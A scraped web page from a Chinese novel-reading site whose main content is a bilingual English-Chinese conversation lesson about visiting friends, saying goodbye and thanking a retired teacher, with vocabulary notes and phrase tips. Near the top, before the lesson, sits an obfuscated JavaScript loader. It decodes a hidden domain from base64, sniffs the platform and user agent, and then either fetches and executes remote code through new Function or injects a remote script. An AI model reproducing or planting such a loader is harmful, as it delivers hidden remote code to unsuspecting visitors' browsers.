妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

03 亲朋好友(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

雪莉:是吗?谢谢。

david: please have a sit. make yourself at home! what would you like to drink, coffee or tea?

戴维:请坐。请随意,别拘束!你要喝点什么,咖啡还是茶?

shirley: tea, please.

雪莉:喝茶吧。

david: i bought some “longjing tea” last week. why don&#039;t you have a taste?

戴维:我上星期刚买了些龙井茶,你尝尝看。

shirley: it&#039;s great. it has a nice aroma. thank you. what have you been doing for the past six months?

雪莉:这可是好茶,闻起来特别香。谢谢。你这半年都干了些什么?

david: i&#039;ve changed my job and became a businessman.

戴维:我换了工作,下海经商了。

shirley: oh, is your business proceeding smoothly?

雪莉:哦,生意还顺利吧?

david: i met some difficulties at first, but now it has developed along the right track.

戴维:刚起步时遇到了一些困难,现在已经步入正轨了。

shirley: congratulations to you!

雪莉:恭喜你呀!

david: thank you.

戴维:谢谢。

notes

1. have a taste 尝一尝

2. aroma [?&#039;r?um?] n. 浓香,香气

3. proceed [pr?&#039;si:d] v. 继续进行;开始,着手;进行,开展

4. at firs 最初,起先,刚开始时

5. track [tr?k] n. 轨道,跑道;踪迹,小路;v. 追踪,跟踪

小贴士

1. i&#039;m sorry i didn&#039;t call first.

对不起,来之前我没先打个电话。

2. how nice of you to come!

你能来太好了!

也可以这样说:

thank you for coming.

3. please feel free to make yourself at home.

别客气,像在自己家一样。

也可以这样说:

make yourself at home.

4. would you like something to drink?

你想喝点什么?

也可以这样说:

would you care for something to drink?

what would you like to drink?

5. i&#039;d better get going now.

我得告辞了。

也可以这样说:

i have to leave now.

i must be going now.

6. thanks so much for inviting me today.

非常感谢你今天的盛情招待。

也可以这样说:

i really appreciate all of your hospitality.

7. drop by at any time.

欢迎随时来访。

也可以这样说:

come and visit anytime.

feel free to come to visit me any time.

切记保持联络

dialogue

after the revelry in karl&#039;s home, susan has got to run.

在卡尔家狂欢后,苏珊要走了。

susan: karl, i had a great time tonight, but it&#039;s getting late. i&#039;d better go.

苏珊:卡尔,我今晚玩得很愉快,但是现在太晚了,我得走了。

karl: no, not so soon. can&#039;t you stay any longer?

卡尔:不,不要急着走啊。不能再待会儿吗?

susan: i&#039;m afraid not, and i am a little tired,too. time to call it a night for me.

苏珊:恐怕不能,而且我也有点累了。今晚就玩到这吧。

karl: all right. i can&#039;t stop you if you are set on going.

卡尔:好吧。如果你决意要走,我也留不住你啊。

susan: well, thanks so much for inviting me today. i had a rorty time. goodbye.

苏珊:非常感谢你今天邀请我。我玩得很尽兴。再见。

karl: goodbye, susan. thank you very much for coming. hope to see you again. i&#039;ll miss you!

卡尔:再见,苏珊。非常感谢你能来。希望能再次见面。我会想你的!

susan: i&#039;ll miss you, too. so long! do remember staying in touch.

苏珊:我也会想你的。再见。一定要记得保持联络哟。

karl: i will. take care!

卡尔:我会的。保重!

notes

1. be set on 决心要(一心想,专心于)

2. rorty [&#039;r?:ti] adj. 有趣的;喜欢玩乐和刺激的;(人声)喧闹的

3. stay in touch 保持联系

小贴士

表示“保持联系”的短语:

keep in touch

stay in touch

keep up with

keep in contact with sb.

stay in contact with sb.

be in touch

liaise with sb.

师恩永记在心头

dialogue

one of julie and shirley&#039;s head teachers has retired this year. tomorrow is teachers&#039; day. they are discussing how to express their gratitude to her.

朱莉和雪莉的一个班主任今年退休了。明天是教师节,她们在讨论着该怎样表达她们对老师的感激之情。

julie: hey, shirley. do you remember our head teacher in senior high school?

朱莉:嘿,雪莉。你还记得我们高中时的班主任吗?

shirley: of course. she helped me a lot that time.

雪莉:当然记得,她那时候帮助了我很多。

julie: she has just retired this year. i think we should have time to pay a visit to her. we have graduated from high school for almost six years, but we rarely call in her.

朱莉:她今年刚退休。我认为我们应该抽空去看看她。我们高中毕业都将近6年了,却很少去看她。

shirley: yes, i will never forget her humor and kindness. tomorrow happens to be teachers&#039; day. maybe we can visit her and send her a present tomorrow.

雪莉:是呀,我永远不会忘记她的幽默和慈爱的。明天恰巧是教师节。也许我们可以明天去拜访她,送她一份礼物。

julie: oh, i almost forgot it. i would give her a call on teachers&#039; day before. what present are we going to send to her?

朱莉:噢,我差点忘了。我以前每到教师节都会给她打个电话的。我们给老师送什么礼物啊?

shirley: flowers. i remember she likes lilies best. we can buy her some lilies and baby&#039;s breath.

雪莉:送花吧。我记得她最喜欢百合花。我们就买些百合和满天星吧。

julie: good idea. let&#039;s have a bunch of flowers reserved.

朱莉:好主意。现在就去订一束吧。

notes

1. senior [&#039;si:nj?] adj. 地位较高的,高级的;年长的;资深的;n. 上司;年长者,长辈;大四学生

2. rarely [&#039;r??li] adv. 很少,难得

3. for ever 永远

4. lily [&#039;lili] n. 百合花;adj. 纯白的

5. baby&#039;s breath 满天星

6. a bunch of 一束;一群,一伙;很多

小贴士

1. your lessons are still the one that helps me; your words are still fresh and warm; you&#039;ve swayed my life so deeply. you&#039;re still my best teacher for ever.

您的教诲我至今仍受益良多,言犹在耳,深深影响了我。您是我最敬爱的老师。

2. you are a special person in my life. we all love you, sir!

您是我生命中很特别的一个人。我们都敬爱您,老师!

3. i&#039;m more thankful than i can express.

对您的谢意,我无法用语言来表达。

4. i am sincerely grateful to you for what you have done.

我真诚地感激您所做的一切。

5. you are like a third parent. we all love you and respect you.

您就像我们的家长,我们都很敬爱您。

6. send you our everlasting feeling of gratefulness and thankfulness on this special day. happy teachers&#039; day!

在这特别的日子谨向您致以我们无尽的感激之情。祝您教师节快乐!

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间